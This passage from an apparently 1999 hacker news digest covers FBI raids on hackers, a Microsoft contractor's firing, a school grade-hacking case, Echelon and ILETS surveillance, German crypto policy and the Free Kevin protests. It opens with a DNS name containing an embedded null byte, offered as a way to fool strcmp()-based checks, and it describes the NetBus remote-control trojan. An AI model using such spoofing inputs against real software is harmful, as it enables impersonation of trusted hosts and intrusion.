> to a denial of service attack. Another thing to remember is that it is possible to put ABSOLUTELY ANYTHING inside a DNS domain name. This includes whitespace, control characters, and even NULL. Imagine what could happen if some program did a strcmp() on the following name: rs.internic.net\0.xa.net where, of course, \0 is a null Interested readers may ponder what type of programs may be exploited with this type of attack. @HWA 28.0 Microsoft Worker Raided ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid VallaH, one of the victims of the recent FBI raids, was a contractor for Microsoft working on Windows 2000 interoperability. Although he was not arrested and charges have not been filed against him he still lost his job. This of course raises the question of who is working where? Do employers really know the backgrounds of their employees? Is there anyway to tell? MSNBC http://www.msnbc.com/news/275876.asp Perils of moonlighting as a hacker Microsoft employee was raided by FBI last week; are hackers working all over the software industry? By Bob Sullivan MSNBC June 2 — Everybody does it; nobody wants to talk about it. Computer hackers — “white hat” or “black hat” — are among the brightest minds in the software industry, so many are hired by big-name software companies. Then they dance the awkward dance of dual identities, engineer by day, hacker by night. The consequences of a misstep in that dance can be severe, as a hacker calling himself “VallaH” learned last week. In his case, a visit from the FBI meant the end of his career at Microsoft, embarassment for the largest software company in the world, and a new focus on the role of hackers at work. JEFFREY ROBERSON, 19, was a self-described “angry little kid” two years ago, fairly well-known as VallaH on the hacking scene, dabbling in writing hacker software tools. At his worst, he says, he participated in relatively benign “denial-of-service” attacks — coordinated efforts to try to overwhelm a Web site with hits so it becomes unavailable. Then a Microsoft employee saw his programming code, was duly impressed and invited VallaH to Redmond, Wash. Over time, Roberson was convinced to put his skills to good use and took the job. He’s spent the past year working on Windows 2000, testing for interoperability with Unix systems — his specialty. (Note: Microsoft is a partner in MSNBC.) But he also stayed involved in the hacker “scene.” He says he hadn’t done anything illegal since taking his job at Microsoft; in fact he says he spent his time trying to convince other “angry little kids” that they could be creative instead of destructive. “I talked to them because I wanted to try to help them program.” But someone passed his “handle” to the FBI recently. Then his Seattle-area apartment was raided May 26 in the hacker sweep, and VallaH’s life instantly changed. He was immediately fired by Microsoft and went back home to his parents in the Baltimore area. I’M ASHAMED THEY’RE INVOLVED “Some people who had absolutely nothing to with with hacking at all [were raided]. “People with things going for them, innocent people, who are going to face consequences. — JEFFREY ROBERSON “It’s Microsoft policy; I understand where they’re coming from,” Roberson said of his dismissal. He was actually a contractor at Microsoft, working through the Volt Computer agency. “I’m more of a liability than an asset.... I owe a great debt to Microsoft, and I’m really ashamed that they’re involved.” Are other “hackers” working at Microsoft? Does the company recruit in the underbelly of the Internet, places like Internet Relay Chat rooms set up for hackers? The company wouldn’t say. “We don’t recruit people who are involved in illegal activities,” spokesman Adam Sohn said. “But did one computer scientist see [VallaH’s code] and thought, gee, this is ... great work, we should get this person? Surely that may happen.” Other software firms wouldn’t discuss company policies about hiring hackers when contacted for this article — but hackers say the practice is common and complicated. IT’S ONLY NATURAL “It is only natural to assume that someone who defaces Web pages at night also works for a computer-related company,” said a man calling himself Space Rogue. Rogue works for L0pht Heavy Industries, a company of “professional hackers” that is hired by firms to test corporate system security. “Last place I worked I tried to keep my involvement with L0pht and stuff quiet. Then word got around, as it always does. Then I get treated like royalty, and people tell me all the dirty deeds they have done to the company systems. Back doors, reading the boss’s e-mail, all kinds of s***. I just shake my head and wonder. “The issue is most employers have no idea what the background is of their employees. I mean, it’s not like you’re going to put ‘defaced 150 Web sites’ on your resume. And unless you have been arrested, no background check is going to turn anything up.” FIND A HOLE, GET A JOB On the other hand, exposing security holes in front of the world is even better than a resume, said Russ Cooper, who moderates the most popular information service covering Windows NT security. His NTBugTraq mailing list has 25,000 subscribers, and his Web site gets 2 million hits a month. “The issue is most employers have no idea what the background is of their employees. I mean, it’s not like you’re going to put ‘defaced 150 Web sites’ on your resume.” — SPACE ROGUE L0phy Heavy Industries “A lot of people release exploit information to get jobs,” Cooper says. Posting an exploit, or a security hole, to his list is one sure way to get the attention of software firms. “Certainly I know of people who have posted and gotten job offers. Companies are interested in people who have demonstrated an aptitude for discovering problems. Finding people with skills is hard.” But is it worth the risk? No, says Christopher Klaus, who founded Internet Security Systems Inc. The company writes software designed to automatically test for exploitable security holes, so-called scanning software. For ISS software to work, his programs must imitate the thought process of hackers — still Klaus says he ignores the resumes he gets from hackers. “We find we have more success finding people with a networking background, people who know Unix and can program in C++, then train them in security. That works better than the other way around,” he said. HAVING A HACKER ON STAFF “What’s more fun than a buddy’s reaction when the CD-drive door is opened mysteriously. :) ” — CARL-FREDRIK NEIKTER Having a hacker on staff is complicated because of the vague distinctions often made between “white hat,” “black hat,” hackers and crackers. Anyone involved in computer security might be called a hacker (in fact, many say anyone involved in any kind of progamming is a hacker). Computer security administrators consider hacker mailing lists, Web pages and even chat rooms as part of their daily reading material, a requirement for keeping their systems secure against the latest exploits. And there’s all manner of playful “hacking” that goes on inside a company. One Microsoft employee told MSNBC that groups within the company sometimes hack each other’s Web pages, a harmless form of taunting. But when does that kind of playfulness cross the line, become harmful? Many hackers don’t believe temporarily defacing a Web page is destructive, though it is illegal. But what of the authoring of hacker “tools,” which are not illegal? For example, there are software packages used to scan Web sites for vulnerabilities; they are equally useful to security administrators testing their own systems and hackers looking for open doors. Other software simply makes it easy for someone who’s less skilled to hack into Web sites. That’s what Roberson was writing when Micosoft contacted him — he was one of many coders who write and distribute software that can be used to crack Web sites, then share it with a wink, saying they’re not responsible for how others use it. HACKING TOOLS Among the most popular examples is NetBus, which allows a hacker to control a victim’s PC from anywhere on the Internet, right down to opening and closing the CD-ROM door. Its author, Carl-Fredrik Neikter, said he wrote NetBus “solely to have a fun program. What’s more fun than a buddy’s reaction when the CD-drive door is opened mysteriously. :) I didn’t think about trojans or a hacking tool.” He’s now trying to market the tool as commercial shareware. Others who write such tools say they’re doing it to draw attention to security holes — that was the motivation behind Back Orifice, written by members of the Cult of the Dead Cow, according to member Sir Dystic. While writing such software is not illegal, it’s also not the kind of moonlighting many companies would be proud of. But how much control does a company have over its employees’ activity outside of work? FACING CONSEQUENCES According to Roberson, his Microsoft employers knew he came “from the scene,” even knew he still communicated with hackers. Only the embarrassment of the raid cost him his job — and he now regrets his past as a hacker. “I wish I didn’t talk to these people,” he said. “But I grew up in the scene, it was all I knew, it was who I was.” So he felt an obligation to keep up friendships and “help these kids.” But in the end those friendships cost him his job — and, says Roberson, others involved in the raids are facing similar consequences. “Some people who had absolutely nothing to with with hacking at all [were raided],” he said. “People with things going for them, innocent people, who are going to face consequences.” He says others raided last week got in trouble with school officials and employers but declined to elaborate. Such consequences — and even threats of prosecution and computer seizure made by the White House, CIA and FBI — don’t seem to be deterring many hackers, who on Wednesday continued to deface government Web sites. @HWA 29.0 Is the FBI Missing the Point? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre With the focus of the FBI squarely on web page defacers are more serious criminals being overlooked? Are Scr1pt Kiddies really who the FBI should be worried about? Or should they be searching for cyber crooks whom you do not hear about, that stay in the shadows? ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html 30.0 Norwegian Newspaper Cracked ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by luyten Two 17 year olds were arrested in their home by Norwegian police. Both of them have admitted to defacing the web page of Norway's biggest newspaper "Aftenposten". They replaced the main page with a graphic of three men urinating on the newspapers logo. The defaced page was visible for approximately one and a half hours. Both suspects risk getting a criminal record and being sued for a large amount of money from Aftenposten and Scandinavia Online (SOL) for their alleged losses. Aftenposten- Sorry it is in Norwegian http://www.aftenposten.no/nyheter/nett/d84153.htm HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.htm 31.0 Student Busted for Changing Grades ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by riot Students at Evergreen High School in Washington state paid a fellow student, Adam Jerome, $5 each to change their grades on the school computer. Mr. Jerome now faces a possible charge of computer trespass in the first degree, a Class C felony, for which a first time offender can receive as much as 90 days in jail. The purchasers of the grades, one of whom was the principals daughter, may be charged with being accomplices to a computer trespass. (I'm not even going to get into all the FUD and inaccuracies in this article) The Columbian http://www.columbian.com/06021999/front_pa/60760.html HACKING SUSPECT MAY BE CHARGED Wednesday, June 2, 1999 By TOM VOGT and RICHARD S. CLAYTON, Columbian staff writers It could be the fantasy of many computer-savvy students: hacking into the school's data system and changing your grades. Now prosecutors are considering charges against an Evergreen High School student accused of using his home computer to raise grades for 22 classmates. Twenty-three students were disciplined. One was expelled, one was placed on long-term suspension, and the rest received 10-day suspensions. The incident coincided with increasing national attention to computer security in the wake of high-tech vandalism against computers or Web sites in the FBI, the U.S. Senate, the Department of the Interior and a federal supercomputer laboratory in Idaho. The expelled student is senior Adam Jerome, who was responsible for the hacking, according to a district source. The computer hacking affected "the integrity of the whole system: kids working hard to earn grades," Evergreen Principal Jim Hudson said Tuesday. Art Curtis, Clark County prosecutor, said his office is studying the case and will decide whether to file charges in the next week or so. The charge would be computer trespass in the first degree, a Class C felony. For a first offender, the maximum sentence is 90 days in jail. Kirby Neumann-Rea, district spokesman, said each student paid $5 to have grades inflated. They might face charges of being accomplices to a computer trespass, Curtis said. One of the students is Katy Hudson, daughter of the Evergreen principal. At least one student used the grade boost to get a scholarship, Curtis said. "This is not just a prank," Curtis said. "If there is an issue of a potential scholarship, there is a concern." Some students received credit for courses they never took. District officials said computer security has been upgraded since the incident. The school's computers are part of a system used by 262 districts in the state. The hacking started in February. When a teacher heard about the grade boosts, school officials investigated in April and confronted the students. "All the kids came clean," Hudson said, and that included the computer expert. "He sat down with us and gave us a complete rundown," Hudson said. The district also forwarded correct information to colleges for the students involved. All the seniors will graduate, although Jerome will not go through the graduation ceremony. Evergreen School District School operates its own computer information system, which maintains student grades as well as other records. Evergreen's system is separate from the regional data center maintained by Educational Service District 112. All but one other Clark County district (tiny Green Mountain) uses the ESD's center to secure student grades and other records. The ESD is unaware of any hackers illegally entering its system in recent years, said Marge Cartwright, the ESD's director of communications and information management. Cartwright knows of two attempts to hack into the ESD's data center. Both were unsuccessful. "We feel confident in the security of the system," Cartwright said. "We haven't had a problem with students breaking into it. I'm not concerned about that." To access the ESD's system, a user or hacker would need more than several passwords and a confidential user name. They also would have to navigate more than one "firewall." One of these firewalls limits access by allowing only specific computers at specific schools to enter, Cartwright said. Cartwright said she was unaware how the student allegedly entered Evergreen's system, but could also have used "sniffer" software that helps decipher passwords and codes. @HWA 32.0 FBI Lobbying Group Pushes for EavesDropping Capability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by s3cr3t The International Law Enforcement Telecommunications Seminar (ILETS), a reportedly top secret international lobbying group made up of police officers and security agents from around the world, will attempt to convince New Zealand's government that it needs to filter the Internet. ILETS was founded by the FBI in 1993 to push for wiretap abilities in worldwide communications and has been heavily involved with the ENFOPOL 98 Affair IDG News http://www.idg.co.nz/nzweb/dfca.html Telepolis http://www.heise.de/tp/english/special/enfo/6398/1.html Monday May 31 Lobby group pushes for Police email snooping NZ Police refuse to comment By Paul Brislen - AUCKLAND An international lobby group aims to convince New Zealand's government that it should implement laws requiring Internet service providers (ISP) to allow law enforcement officers access to anyone's email. The lobby group, the International Law Enforcement Telecommunications Seminar (ILETS), is made up of police officers and security agents from a number of Western countries including New Zealand and Australia. Hong Kong is also included. Set up in 1993 by the FBI to push building universal wiretap-ability into worldwide communications, ILETS now has its sights firmly set on tapping into the Internet and may have convinced a meeting of European ministers to adopt its latest plan. ILETS plans to lobby New Zealand's government to introduce similar laws here, although the minister's press secretary, Jonathan Kinsella, says he has not heard of ILETS.NZ Police refuse to comment "That sounds more like an operational matter. That would be handled by national headquarters." New Zealand Police does have a representative in ILETS but he would not comment on ILETS or its role in New Zealand. "It's all supposed to be top secret. I'm surprised you got hold of the name even," he says. He describes ILETS as an "advisory group" and feels that monitoring of Internet communication is a "worldwide trend" of which New Zealand is only a part. New Zealand law does not allow such interceptions to take place here and our strict privacy laws would also cause ILETS some trouble. However, the group will be pushing the issue at a political level. Enfopol 19, the document currently before the European council of ministers, requires manufacturers and operators to build in "interception interfaces" to the Internet and all future digital communications systems. Under the scheme, European ISPs would be required to install monitoring equipment or software on site. The European governments would then have the capability to track an individual's "static and dynamic IP address . credit card number and email address", according to the leaked Enfopol 19 document, available at the Foundation for Information Policy Research's (FIPR) Web site (www.fipr.org). FIPR, which describes itself as "an independent body that studies the interaction between information technology and society", is based in the UK and has been following ILETS since its cover was blown by the German online publication Telepolis. In the UK, opposition from ISPs is growing. "Anything along the lines [of the ENFOPOL scheme] would probably have astronomical cost implications," says Keith Mitchell, chairman of the London Internet Exchange. "In the event such a scheme was ever implementable, the costs should be met by the enforcement authorities. Since the industry cannot afford it I doubt the public sector could." Mitchell doubts whether such a scheme would work on a technical level, something that Telecom is also concerned about. "The amount of email going through Xtra's email servers is around five times the volume it was last year and it's accelerating," says spokesman Glen Sowry. Telecom has recently installed a new email server which is scalable up to a million users. "At this stage you would have to take into consideration the sheer volumes of what you are trying to achieve." European ministers are to meet on May 27 to discuss the adoption of Enfopol 19. More information can be found at: www.heise.de/tp/english/special/enfo/default.html. @HWA 33.0 Cons, Cons and more Cons ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Several hacker conventions are either just around the corner or in early planning stages. Hope 2000, the third incarnation of the famous Hackers On Planet Earth do not have an official date or location yet, but they do have a webpage and it will probably be one of the biggest Hacker Conventions ever. DNSCON is shooting for its second year; to be held in Blackpool, England. WraithCon is planning on Kent University. Hit2000 has finnally announced a date in September. And don't forget the old standbys Defcon, Summercon and others that are just around the corner. HNN Cons Page http://www.hackernews.com/cons/cons.html @HWA 34.0 Friday June 4th: FREE KEVIN Demonstrations Today! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki At approximately 2pm local time on Friday, June 4th, people will gather outside at least 16 Federal Courthouses across the country to protest the continued incarceration of Kevin Mitnick. The demonstrations hope to bring attention to the fact that - Kevin has been denied a bail hearing - Lack of access by the defense to critical evidence - The outrageous claims by software companies as to the amounts of damages caused by copying software. - When this was reported by the media the court blocked access to the defense to further information. Kevin Mitnick has never been accused of being violent, malicious, or getting any sort of compensation for his acts and yet he has been in jail for over four years. Longer than most armed robbers or rapists. It is hoped that these peaceful demonstrations can increase public awareness of this issue and hopefully positively influence his sentencing hearing scheduled for June 14th. Official Press Release http://www.hackernews.com/orig/mitnickpr.html FREE KEVIN Demonstrations http://www.2600.net/demo/ ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2269826,00.html Salon http://www.salon.com/tech/log/1999/06/04/mitnick/index.html Already over, the demonstration in front of the US Embassy in Moscow has been labeled a huge success. This photo taken prior to the event shows some folks from Civil Hackers' School in Moscow and a conspicuously placed FREE KEVIN Sticker. Moscow Demonstration Picture http://www.hackernews.com/images/kewl4.html The demonstration in Washington DC is going to try like hell to webcast the event but their resources are limited. You can try here or here. Hopefully one of them will work. http://www.SteveNet.net/2600/ http://members.xoom.com/gmontag/ There are rumors that several of the demonstrations, especially the one in Atlanta which is the first event of Summercon, will be broadcast live on CNN. We will do our best to bring you updates as necessary. http://www.summercon.org/ Late Update The Philidelphia demonstartion is also attempting to web cast their event. We should hopefully have a URL for you soon. Demonstration are also happening spontaneously in cities that are not listed on the official web page. HNN has received reports of a demonstration taking place in Boston. FOR IMMEDIATE RELEASE NATIONWIDE DEMONSTRATIONS ON FRIDAY TO PROTEST HACKER INCARCERATION NATIONWIDE CONTACT: Emmanuel Goldstein, 917-945-26ŘŘ On Friday, June 4 at 2 pm, demonstrations will take place outside federal courthouses nationwide to protest the continued incarceration of Kevin Mitnick, imprisoned without bail in a pre-trial facility in Los Angeles for over four years. The demonstrations are being organized by the FREE KEVIN movement and seek to shed light on the many injustices of this case. They include: --) Mitnick's denial of a bail hearing, something even a terrorist is given. --) The inability of Mitnick's defense to have access to the evidence against him, making it impossible for them to mount an adequate defense. --) The highly dubious claims of certain cellular phone companies in letters obtained by us which state that Mitnick's mere glancing at their source code cost them hundreds of millions of dollars. These losses were never reported to their stockholders as required by the SEC. --) When the media started to report on these disclosures, the court's response was to prevent any further documentation from being released. Throughout this ordeal, Mitnick has never been accused of doing anything malicious, profiting in any way from his talents, or being a violent criminal. Yet, since February 15, 1995 he has been locked away with some of the most dangerous people around. Our demonstrations will take place to spread the word and put pressure on the appropriate authorities to end this nightmare once and for all. Even those who think Mitnick is guilty of everything he's been accused of are outraged by his continued incarceration. On June 14, the judge in his case will have the option of recommending his immediate release to a halfway house or extending his prison term even longer. For more information on the Mitnick case, check www.freekevin.com. For more information on the demonstrations, contact one of the above people or check www.2600.com/demo. @HWA 35.0 Germany Frees Crypto ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Seraphic Artifex German officials have released a statement on crypto policy. The statement says that for the worldwide protection against electronic interception and economic espionage that the strongest crypto available will be allowed to be used by German citizens. In addition the crypto development community within Germany will be supported and nurtured to create superior crypto products. The statement claims that the need of personal privacy and the protection e-commerce overrides any possible use crypto may have for criminals. German cryptography policy statement http://www.bmwi.de/presse/1999/0602prm1.html English Translation http://jya.com/de-crypto.htm Wired http://www.wired.com/news/news/politics/story/20023.html Wired; Germany Endorses Strong Crypto Wired News Report 5:20 p.m. 3.Jun.99.PDT In an apparent response to corporate spying allegedly conducted in Europe by the United States, Germany is encouraging citizens and businesses to use strong cryptography. "[Germany] considers the application of secure encryption to be a crucial requirement for citizens' privacy, for the development of electronic commerce, and for the protection of business secrets," reads a translated version of a policy framework document released Wednesday by Germany's Federal Ministry of Economic Affairs and Technology. "The federal government will therefore actively support the distribution of secure encryption. This includes in particular increasing the security consciousness of citizens, business, and administration." Australia recently became the first nation to admit it participates in Echelon, a previously secret global surveillance network capable of intercepting electronic communications anywhere in the world. Echelon is said to be principally operated by the United States' National Security Agency and its UK equivalent, the Government Communications Headquarters. In addition to Australia, the system relies on cooperation with other signals-intelligence agencies in Canada and New Zealand. Earlier this month, UK investigative journalist Duncan Campbell submitted Interception Capabilities 2000, his report on Echelon, to the European Parliament's Science and Technology Options Assessment Panel. Campbell had been asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US hands. In the wake of the report, the Australian government confirmed the Echelon alliance to media in follow-up interviews. Though Wednesday's German government statement does not mention Echelon, the document alludes to the specter of industrial espionage. "For reasons of national security, and the security of business and society, the federal government considers the ability of German manufacturers to develop and manufacture secure and efficient encryption products indispensable," the statement said. The government added that it would take additional measures to strengthen its domestic crypto software industry. The policy also cautioned that while encryption may be used to criminal ends, the need to protect electronic commerce overrides any such concerns. The department said it would prepare and release a report on the criminal uses of cryptography within two years. The US government restricts the export of strong crypto on the grounds that it might be used by terrorists and hostile nations to conceal communications. -=- Policy statement; Federal Ministry of the Interior Federal Ministry of Economic Affairs and Technology Bonn, June 2, 1999 Cornerstones of German Encryption Policy The Federal Cabinet in its session of June 2 agreed on the German position on the use of cryptographical methods in e-commerce in the form of “Cornerstones of German Encryption Policy”. The government followed the necessity to take position in this nationally and internationally vital question important for business and e-commerce. Security problems are on the rise with growing traffic on the net. Experts are estimating the losses caused by espionage, manipulation, or damaging of data by billions. Data security is becoming a serious issue with global competition and because of that is affecting jobs in respective businesses. Improved protection of German users on the net by means of better encryption methods is the main concern of this decision. It states clearly that cryptographic methods and products are furthermore permitted to be developed, produced, and used without any restrictions. The yet low awareness towards this issue shall be raised by this decision. The initiative “Security On The Net” by ministries of economic affairs and interior is meant to serve the same purpose Another main aim of the German federal government is to strengthen productivity and international competitiveness of the German suppliers in encryption business which are likely to intensify their efforts with regards to a growing demand. The further opening of the European single market is serving the same purpose: Germany together with its European partners abolished supervision of encryption mass products exported within the EU by revising the EU-dual-use-decree. Simplification of export supervision procedure are under examination by the Bundesausfuhramt (federal export agency?) With the use of cryptography on the raise improper use can’t be ruled out. Therefore the involved ministries will be watching further development thoroughly and deliver a report after 2 years. Efforts to improve the technical equipment of law enforcement agencies are underway. With this well-balanced position the federal government met the requirements for Germany being a secure and productive site in the information age. Cornerstones of German Crypto Policy Introduction Hard- and software for message encoding remained until the beginning of the nineties a negligible niche market. However this niche market is now of considerable importance to the economic and social development in the information age. The input ”information” is developing more and more into a much demanded raw material. Effectively protecting this asset could can be crucial to corporate success and thus determine on prospective employment. This protection today can be effectively ensured only by use of strong encryption tools. Controversy on encryption in Germany The controversy on encryption is about whether or not and to which extent cryptography should be restricted by law. This point has been discussed recently in many democratic industrial countries in a controversial way. An intensive argument took place in Germany too, with several ministries, industry, and numerous social groups participating. In October 1997 the federal cabinet passed the ”Federal report: Info 2000: Germany's way into the information age”, containing a passage on cryptography: ”The Federal Government agrees on waiving to regulate by law the trade and use of cryptographic products and methods. Thus the unrestricted freedom of users with choosing and use of encryption systems remains not affected. The Federal Government will watch further development in the field of cryptography thoroughly particularly within a European and international context. Further measures to reach its goals will be taken if necessary. ” So far the Federal Government has not taken stand definitely and unequivocally. Cryptography and economic interests Due to the dynamic development of digital business dealings the markets for encryption products note high growth rates. Besides the traditional protection of confidence by now encryption systems are mainly used e.g. for digital copyright protection, digital signatures, and digital cash. Beyond this cryptography is a cross-section-technology indispensable for architecture and development of complex e-commerce applications. Indirectly much bigger markets are concerned like e.g. telecommunication, online-banking, or tele-medicine. It’s true that present-day security standards, few years ago affordable only to large-scale enterprises and administration, are now within means of medium-sized and small enterprises as well as private households. But still in Germany cryptography is not used in the required degree. The necessary security awareness is lacking frequently even though considerable losses can be caused by espionage, manipulation, or destruction of data. German crypto manufacturers would have a good chance of keeping up with international competition, if appropriate conditions are ensured. In view of the strategic meaning of the cryptographic sector many important industrial states spare no effort in order to strengthen their economical and technical capacities. Cryptography and security interests Cryptographic methods are of outstanding importance for efficient technical crime protection. That applies to ensuring of authenticity and integrity in data traffic as well as protection of confidence. On the other hand protection of confidence is in favor of perpetrators: With cryptographic applications becoming more user-friendly spreading into criminal circles has to be expected. This could cause serious problems for law enforcement. Lawful surveillance ordered by a court has to remain effective even if the target guards concerned information with a cryptographic system. Up to now abuse of encryption constitutes no serious problem for law enforcement. However there can’t be derived a forecast from this. It is necessary to actively examine possible consequences with regard to the specific needs of law enforcement and national security to early identify any undesirable development and take effective action against them based on alternative strategies. With the recent national discussion as well as the international development as foundations the Federal Government agrees on the following cornerstones of encryption policy: 1. The Federal Government is not intended to restrict the general availability of cryptographic products in Germany. It recognizes the crucial importance of secure encryption for data protection, development of electronic business dealings, and protection of corporate secrets. Therefore the Federal Government will actively support spreading of secure encryption in Germany. This is meant to particularly promote awareness on security issues among business, administration, and private people. 2. The Federal Government aims at strengthening users to trust in cryptographic security. It will take measures to establish a trust framework for secure cryptography, particularly by improving the ability to check cryptographic products on security and recommending of qualified products. 3. The Federal Government considers the capability of German manufacturers to develop and manufacture secure and powerful cryptographic products as crucial to security of nation, business, and society. It will take actions to improve the international competitiveness in this field. 4. The legal authority of law enforcement and security agencies to keep telecommunication under surveillance shall not be eroded by dissemination of strong methods for encryption. Therefore the competent ministries will be watching further development thoroughly and report after 2 years. Irrespective of that the Federal Government will support improving technical competence of law enforcement within the bounds of its possibilities. 5. The Federal Government sets a great store by international cooperation in the field of encryption. It stands up for market-developed open standards as well as interoperable systems and will speak up for strengthening of multi- and bilateral cooperation. @HWA 36.0 US Congress Demands Echelon Docs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid An amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Sen. Bob Barr (R-Ga.) will force the director of Central Intelligence, the director of NSA and the attorney general to submit a report to Congress that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0531/web-nsa-6-3-99.html JUNE 3, 1999 . . . 18:34 EDT Congress, NSA butt heads over Echelon BY DANIEL VERTON (dan_verton@fcw.com) Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens. According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Rep. Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon. Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998]. However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege. Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said. "This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community. Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy." @HWA 37.0 Windows2000 Already Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by 0Day Officials in Singapore have confiscated over 700 pirated copies of Microsoft Windows2000 from area merchants. Raids last Monday turned up the software at two different retailers in residential areas of Katong and Kallang, Singapore. Windows2000 has not yet been officially released. The Straits Times http://web3.asia1.com.sg/archive/st/4/cyb/cyb1_0603.html JUN 3 1999 Pirated Office 2000 being sold PIRATED copies of Microsoft Office 2000 are already being sold here though the official launch of the new software takes place only next Monday. Two raids last Monday turned up the pirated copies. They were found at two retail outlets in residential areas at Katong and Kallang. Microsoft Singapore said in a statement on Tuesday that its representatives and the Intellectual Property Rights Warrant Unit seized about 700 CD-ROMs containing pirated software. Microsoft's regional anti-piracy spokesman Rebecca Ho said: "This is an illustration of the pervasiveness of the problem and the speed with which pirates operate." Microsoft warns that counterfeit software can contain viruses that could cause problems to a computer's software and hardware, and cost hundreds or thousands of dollars to fix. @HWA 38.0 NetBus Takes #1 Spot ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by judd After given a 5 cow review from TUCOWS Netbus Pro, the remote administrartion software recently turned shareware has reached the #1 spot at DaveCentral after only five dayss. Dave Central http://www.davecentral.com/hot.html NetBus http://www.netbus.org @HWA 39.0 [ISN] Police will have 24-hour access to secret files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.the-times.co.uk/news/pages/tim/99/05/27/timnwsnws01019.html?999 May 27 1999 BRITAIN Police will have 24-hour access to secret files Stewart Tendler E-mail code-busters to join crime fight A 24-HOUR technical centre to help to crack secret Internet and e-mail systems used by criminals is being set up by the computer industry and the police. The centre will open encrypted messages for officers who have a warrant. If the codes cannot be cracked it will call in computer specialists. Ministers are also introducing laws giving police and Customs investigators powers to order Internet operators to unlock encrypted systems for taps. Users could also be forced to hand over codes protecting information. The plans were announced yesterday as ministers released a report by the Cabinet Office's Performance and Innovation Unit on the problems of encryption and police investigations. The report revealed that telephones taps last year led to the seizure of three tonnes of heroin and cocaine and the arrest of 1,200 criminals. Underlining that interceptions have become an "essential tool" the report said that one suspect involved in serious crime was arrested for every two warrants issued by Jack Straw, the Home Secretary. Interceptions became vital when intelligence could not be obtained by surveillance or informants. In 1996-97 the taps resulted in the seizure of 450 guns and 112 tonnes of drugs, such as cannabis, worth #600 million. Looking at ways of dealing with the rise of encryption programmes for e-mail and telephone systems, the report found that although there was general public acceptance of current telephone taps there was strong aversion in some areas to secret police access to the Internet. The Government has already ruled out creating an authority which would hold the "keys" to encrypted systems sold by licensed firms and allow access to investigators. The report concluded that such a plan would be unwieldy and still would not give police enough access. Yesterday Mr Straw said the plans showed that government and industry could work together. The aim was to develop the use of the Internet for commerce without encouraging or helping crime. Case histories released yesterday show how terrorists and paedophiles are already using encryption and slowing or halting investigations. In 1995 two men were arrested in the Home Counties and accused of being at the centre of a ring putting out child pornography. Detectives believed that encrypted material had been sent worldwide. The men were later jailed but 10 per cent of the material was never uncovered. Last year police investigating sex and attempted murder allegations found encrypted material on a suspect's computer. They finally cracked the code when they discovered the decryption key among other material. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 40.0 [ISN] Hack attack knocks out FBI site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FBI cracks down on hacker group -- then fbi.gov is knocked offline by hack attack. By Bob Sullivan and Brock Meeks, MSNBC May 26, 1999 6:44 PM PT A skirmish between the FBI and a well-known hacker group seemingly erupted Wednesday. Not long after federal agents served search warrants on members of hacker group Global Hell (gH), probably in connection with recent attacks on U.S. government computers, the FBI's own Web site was attacked and is currently offline. Earlier on Wednesday, MSNBC was told by a member of gH that the FBI had served search warrants on several members of the hacker group. Last week, gH member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three separate attacks on U.S. government computers, including systems at the U.S. Information Agency. A hacker identifying himself as "Most Hated," the founder of gH, told MSNBC he was raided by agents at about 6 a.m. Wednesday morning in what he described as a "a huge hacker crackdown." He said he knows of nine people who were raided by government officials -- including four in Houston, three in California and one in Seattle. None was arrested, but all had computer equipment confiscated, he said. Late 